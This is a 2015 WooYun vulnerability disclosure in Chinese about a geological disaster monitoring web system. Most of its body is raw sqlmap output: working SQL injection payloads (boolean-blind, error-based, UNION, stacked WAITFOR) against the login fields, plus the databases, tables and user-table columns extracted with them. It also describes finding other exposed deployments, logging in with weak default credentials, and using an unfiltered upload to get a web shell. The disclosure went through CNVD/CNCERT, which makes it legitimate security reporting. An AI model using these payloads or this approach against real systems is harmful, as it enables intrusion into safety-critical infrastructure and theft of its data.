当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149542

漏洞标题:工控安全之某地质灾害监测系统存在通用漏洞

相关厂商:北京江伟时代科技有限公司

漏洞作者: 道极

提交时间:2015-10-27 21:07

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

某地质灾害监测系统web端存在通用漏洞

详细说明:

北京江伟时代科技有限公司开发的地址灾害监测系统web端存在通用sql注入漏洞和任意上传
**.**.**.**:8080/login.jsp 此处有注入,登陆抓包即可
**.**.**.**:8088/ 这个端口也有注入,但是有验证码,白天跑不出来,但是晚上可以跑出来,估计是晚上数据通信比较少吧

sqlmap identified the following injection points with a total of 366 HTTP(s) requests:
---
Parameter: my_user (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJNDg3MTQwNjg1D2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUp5oKo55qE5a+G56CB6L6T5YWl5pyJ6K+vLOivt+mHjeaWsOi+k+WFpS5kZGRKF/vYkA9/MJmiAxGMukuTCZf2pK+EBkdUBU0KGPovTA==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQL62PfHDgL/yfCwDwLPxOenDwLGxteXAwKC3IeGDKJhIM00s7N7krIr+PT6Z520v6cc4W/Kie9wzn5pX2+z&my_user=admin' AND 8425=8425 AND 'aNrz'='aNrz&my_pwd=123456&my_code=jbnc&btnLogin=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJNDg3MTQwNjg1D2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUp5oKo55qE5a+G56CB6L6T5YWl5pyJ6K+vLOivt+mHjeaWsOi+k+WFpS5kZGRKF/vYkA9/MJmiAxGMukuTCZf2pK+EBkdUBU0KGPovTA==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQL62PfHDgL/yfCwDwLPxOenDwLGxteXAwKC3IeGDKJhIM00s7N7krIr+PT6Z520v6cc4W/Kie9wzn5pX2+z&my_user=admin' AND 1508=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1508=1508) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113))) AND 'OeLK'='OeLK&my_pwd=123456&my_code=jbnc&btnLogin=
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: __VIEWSTATE=/wEPDwUJNDg3MTQwNjg1D2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUp5oKo55qE5a+G56CB6L6T5YWl5pyJ6K+vLOivt+mHjeaWsOi+k+WFpS5kZGRKF/vYkA9/MJmiAxGMukuTCZf2pK+EBkdUBU0KGPovTA==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQL62PfHDgL/yfCwDwLPxOenDwLGxteXAwKC3IeGDKJhIM00s7N7krIr+PT6Z520v6cc4W/Kie9wzn5pX2+z&my_user=-8685' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113)+CHAR(87)+CHAR(75)+CHAR(108)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(113)+CHAR(100)+CHAR(115)+CHAR(71)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)-- &my_pwd=123456&my_code=jbnc&btnLogin=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: my_user (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJNDg3MTQwNjg1D2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUp5oKo55qE5a+G56CB6L6T5YWl5pyJ6K+vLOivt+mHjeaWsOi+k+WFpS5kZGRKF/vYkA9/MJmiAxGMukuTCZf2pK+EBkdUBU0KGPovTA==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQL62PfHDgL/yfCwDwLPxOenDwLGxteXAwKC3IeGDKJhIM00s7N7krIr+PT6Z520v6cc4W/Kie9wzn5pX2+z&my_user=admin' AND 8425=8425 AND 'aNrz'='aNrz&my_pwd=123456&my_code=jbnc&btnLogin=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJNDg3MTQwNjg1D2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUp5oKo55qE5a+G56CB6L6T5YWl5pyJ6K+vLOivt+mHjeaWsOi+k+WFpS5kZGRKF/vYkA9/MJmiAxGMukuTCZf2pK+EBkdUBU0KGPovTA==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQL62PfHDgL/yfCwDwLPxOenDwLGxteXAwKC3IeGDKJhIM00s7N7krIr+PT6Z520v6cc4W/Kie9wzn5pX2+z&my_user=admin' AND 1508=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1508=1508) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113))) AND 'OeLK'='OeLK&my_pwd=123456&my_code=jbnc&btnLogin=
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: __VIEWSTATE=/wEPDwUJNDg3MTQwNjg1D2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUp5oKo55qE5a+G56CB6L6T5YWl5pyJ6K+vLOivt+mHjeaWsOi+k+WFpS5kZGRKF/vYkA9/MJmiAxGMukuTCZf2pK+EBkdUBU0KGPovTA==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQL62PfHDgL/yfCwDwLPxOenDwLGxteXAwKC3IeGDKJhIM00s7N7krIr+PT6Z520v6cc4W/Kie9wzn5pX2+z&my_user=-8685' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113)+CHAR(87)+CHAR(75)+CHAR(108)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(113)+CHAR(100)+CHAR(115)+CHAR(71)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)-- &my_pwd=123456&my_code=jbnc&btnLogin=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [22]:
[*] CAWS600B
[*] CAWSAnyWhereServer
[*] Chongqing
[*] FJJC
[*] GeoDisasterAndMonitoringFengJie
[*] GeoDisasterAndMonitoringProduct4_FJ
[*] gloconnrts3
[*] hcjc
[*] JW_MONITORDB
[*] lqtx
[*] master
[*] model
[*] msdb
[*] RTMDataBase
[*] rts3
[*] SysAdmin_FengJie
[*] SysAdmin_FJ
[*] tempdb
[*] TotalView
[*] ZHDProjmgr
[*] 变形监测
[*] 移动站监测


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: my_user (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJNDg3MTQwNjg1D2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUp5oKo55qE5a+G56CB6L6T5YWl5pyJ6K+vLOivt+mHjeaWsOi+k+WFpS5kZGRKF/vYkA9/MJmiAxGMukuTCZf2pK+EBkdUBU0KGPovTA==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQL62PfHDgL/yfCwDwLPxOenDwLGxteXAwKC3IeGDKJhIM00s7N7krIr+PT6Z520v6cc4W/Kie9wzn5pX2+z&my_user=admin' AND 8425=8425 AND 'aNrz'='aNrz&my_pwd=123456&my_code=jbnc&btnLogin=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJNDg3MTQwNjg1D2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUp5oKo55qE5a+G56CB6L6T5YWl5pyJ6K+vLOivt+mHjeaWsOi+k+WFpS5kZGRKF/vYkA9/MJmiAxGMukuTCZf2pK+EBkdUBU0KGPovTA==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQL62PfHDgL/yfCwDwLPxOenDwLGxteXAwKC3IeGDKJhIM00s7N7krIr+PT6Z520v6cc4W/Kie9wzn5pX2+z&my_user=admin' AND 1508=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1508=1508) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113))) AND 'OeLK'='OeLK&my_pwd=123456&my_code=jbnc&btnLogin=
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: __VIEWSTATE=/wEPDwUJNDg3MTQwNjg1D2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUp5oKo55qE5a+G56CB6L6T5YWl5pyJ6K+vLOivt+mHjeaWsOi+k+WFpS5kZGRKF/vYkA9/MJmiAxGMukuTCZf2pK+EBkdUBU0KGPovTA==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQL62PfHDgL/yfCwDwLPxOenDwLGxteXAwKC3IeGDKJhIM00s7N7krIr+PT6Z520v6cc4W/Kie9wzn5pX2+z&my_user=-8685' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113)+CHAR(87)+CHAR(75)+CHAR(108)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(113)+CHAR(100)+CHAR(115)+CHAR(71)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)-- &my_pwd=123456&my_code=jbnc&btnLogin=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: rts3
[37 tables]
+-------------------------+
| db_owner.xb_perioddata2 |
| sysdiagrams |
| xb_adminarea |
| xb_alarmUserRecords |
| xb_alarmlog |
| xb_alarmnetuser |
| xb_alarmperson |
| xb_alarmstandard |
| xb_alarmstaterecord |
| xb_alarmtype |
| xb_config |
| xb_connectrecord |
| xb_deepsurvey |
| xb_devicetypetable |
| xb_menu |
| xb_nettype |
| xb_netwaterleveltype |
| xb_perioddata |
| xb_porepressure |
| xb_rain |
| xb_rockfalldata |
| xb_rolemenu |
| xb_rolemenu |
| xb_rtsnet |
| xb_slidingforcedata |
| xb_stationphone |
| xb_stationphone |
| xb_stationstatus |
| xb_syslog |
| xb_uploadfile |
| xb_userlog |
| xb_userlog |
| xb_usermenu |
| xb_usernet |
| xb_userrole |
| xb_watatabledata |
| xb_waterlevel |
+-------------------------+


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: userid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userid=admin' AND 3341=3341 AND 'xqfO'='xqfO&password=123456&x=63&y=56
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: userid=admin';WAITFOR DELAY '0:0:5'--&password=123456&x=63&y=56
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: userid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userid=admin' AND 3341=3341 AND 'xqfO'='xqfO&password=123456&x=63&y=56
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: userid=admin';WAITFOR DELAY '0:0:5'--&password=123456&x=63&y=56
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: userid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userid=admin' AND 3341=3341 AND 'xqfO'='xqfO&password=123456&x=63&y=56
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: userid=admin';WAITFOR DELAY '0:0:5'--&password=123456&x=63&y=56
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
Database: JW_MONITORDB
Table: JW_SYS_USER
[16 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| ADDRESS | varchar |
| AREA_CODE | int |
| CREATE_DATE | datetime |
| DEL_FLAG | int |
| DESCRIPTION | varchar |
| EMAIL | varchar |
| ID | int |
| LOGIN_DATE | datetime |
| LOGIN_IP | varchar |
| LOGIN_NAME | varchar |
| NAME | varchar |
| PASSWORD | varchar |
| PHONE | varchar |
| SYSTEMID | int |
| UPDATE_DATE | datetime |
| USER_STATUS | varchar |
+-------------+----------+


登录后台看看

1.jpg


2.jpg


可以注出数据,但是表太多,有时候不知道哪个表是存用户名的表
到其公司官网看一下,发现有很多地质局都是用的这套系统,但是一般这套系统是没有域名的,只能通过特殊方法搜索

3.jpg


下面搜了一些
**.**.**.**:8080/Default.aspx
**.**.**.**:81
**.**.**.**:8080/login.aspx
**.**.**.**:8090/login.jsp
**.**.**.**:8090/jwsd/manage/index.jsp
**.**.**.**:8090/login.jsp
**.**.**.**:8080/login.jsp
**.**.**.**:8081/login.jsp 这个版本用的比较新,但是仍然有注入
**.**.**.**:8081/login.jsp
其中一个登录进去了,验证一下上传
**.**.**.**:8080/Login.aspx 以这个为例 admin 123456(虽然有些是弱口令吧,但是都有注入)

4.jpg


5.jpg


6.jpg


未做任何过滤
getshell证明一下,就不提取权了

7.jpg


漏洞证明:

如上
用这套CMS的网站还是很多的,主要是关系到民生安全,地质灾害监测啊,除了注入,况且后台还可以getshell,况且有一些是弱口令,不知道能不能过啊,这个能不能上首页啊,不能的话就提补天了

修复方案:

版权声明:转载请注明来源 道极@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-30 17:30

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供修复方案。同时,将相关案例下发给对应的CNCERT分中心,由其后续协调网站管理单位处置.

最新状态:

暂无